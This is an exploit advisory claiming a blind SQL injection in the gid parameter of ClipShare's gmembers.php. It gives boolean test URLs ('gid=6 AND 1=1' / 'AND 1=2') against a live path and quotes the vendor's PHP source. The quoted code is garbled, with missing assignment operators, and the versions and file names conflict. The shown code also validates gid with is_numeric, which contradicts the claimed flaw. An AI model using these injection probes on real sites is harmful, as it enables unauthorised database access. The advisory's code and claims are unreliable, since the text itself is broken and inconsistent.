ClipShare 4.1.1 (gmembers.php gid param) - Blind SQL Injection Vulnerability



# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability

# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

<?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require(
'include/function.php');
require(
'classes/pagination.class.php');
require(
'language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  NULL;
$gurl   NULL;
$oid    NULL;
$gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql    "SELECT * FROM group_own WHERE GID='" .$gid"' limit 1";
$rs     $conn->execute($sql);
if ( 
$conn->Affected_Rows() == ) {
    
$urlkey     $rs->fields['gurl'];
    
$gname      $rs->fields['gname'];
    
$gupload    $rs->fields['gupload'];
    
$oid        $rs->fields['OID'];
    
STemplate::assign('gname'$gname);
    
STemplate::assign('gurl'$urlkey);
    
STemplate::assign('gupload'$gupload);
} else {
    
session_write_close();
    
header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................
 
?>

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac